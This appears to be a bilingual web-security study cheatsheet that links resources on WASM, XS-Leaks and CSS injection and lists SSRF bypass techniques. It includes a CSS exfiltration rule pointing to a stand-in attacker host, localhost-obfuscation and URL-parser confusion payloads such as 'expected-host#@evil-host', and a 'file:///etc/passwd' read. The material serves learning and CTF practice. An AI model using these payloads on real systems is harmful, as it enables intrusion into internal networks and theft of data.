Security Learning

Cheatsheet, Links, Enjoy it ☕️

Topic	Des
How to take good practice	learn security, read source code...
WASM	Web Assembly
Frontend	Browser knowledge
XSS	XSS
SSRF	SSRF

How to take a good practice

• 安全研究者的自我修养
• So you want to be a web security researcher?
• 如何阅读一份源代码？

WASM

• WebAssembly Concepts
• Using the WebAssembly JavaScript API
• Introduction to WebAssembly
• 玩轉 WebAssembly && 逆向

Frontend

• 你真的会使用XMLHttpRequest吗?
• SOP與CORS安全詳解

XSS

XS-Leaks

• Exposing Intranets with reliable Browser-based Port scanning
• 从35c3CTF的filemanager题目中学到的一个小tips
• github-xsleaks
• secret note keeper -- Facebook CTF 2019
• gimme-a-bit-exploring-attacks-in-the-post-xss-world

雖然和XSS一樣是跨域偷信息的技巧，但因為受限於SOP所以不是直接回傳信息，而是利用盲注: 配合爆破觀察瀏覽器的行為(猜中和沒猜中頁面會有何差異)! 至於如何跨域觀察瀏覽器的行為呢? 特定信息是可以跨域傳送的，像是iframe count就不受SOP的限制，樓上35c3的filemanager就是利用onload數量和xss-auditor來跨域爆破出flag的!

Steal data with CSS

• 使用CSS窃取数据：攻击与防守

在頁面中注入css，利用attribute selector，若match則傳送特定query ({background:url("https://attack.host/aa");}) 到自己的server以竊取資訊!

SSRF

Find server's API which will send request

Bypass IP, URL limit

127.0.0.1
127.0.1
127.1
0.0.0.0   // linux
0.0
0
127.0.0.1.xip.io
0x7f000001
2130706433
017700000001
ⓛⓞⓒⓐⓛⓗⓞⓢⓣ   // enclosed alphanumerics
[::]
// use to port to bypass ip segment limit
127.0.0.1:80

// intranet
10.0.0.0/8   // 10.0.0.0 ~ 10.255.255.255
172.16.0.0/12   // 172.16.0.0 ~ 172.31.255.255
192.168.0.0/16  // 192.168.0.0 ~ 192.168.255.255
127.0.0.0/8
0.0.0.0/8

• Obfuscation: double URL-encoding
• According to RFC3968
  url preceded by a double slash, terminated by the next slash, ? or #, or the end of url.
  check url supports @ (embedded credential) or not, combine following payloads with obfuscation
  • evil-host#@expected-host
  • expected-host#@evil-host:evil-port:expected-port
  • expected-host@evil-host
  • evil-host#expected-host

Match rules:

// php
parse_url():
host: the host after the last @

// libcurl
host: the host after the first @

302 Redirect bypass

Check only first time and ignore the second time
find redirect vulnerability e.g. http://aaa.com/a?req=/b
put into API which is already believed by server e.g. api=http://aaa.com/a?req=evil-host

Protocol

• dict://<user-auth>@<host>:<port>/
• sftp://
• file://

  file:///etc/passwd
  // the part of first two slashes after file is <protocol>
  // the third slash is <root dir>
  file://domain/etc/passwd

• tftp://
• ldap://
• gopher://
  利用 Gopher 协议拓展攻击面

Blind-SSRF

Some more challenges?

• Only partial url is controlled?

Tool

• requestbin
• CEYE

Reference

• Portsigger material
• 了解SSRF，這一篇就足夠了
• SSRF testing resources
• 談一談如何在python開發中拒絕SSRF漏洞
• SSRF 學習紀錄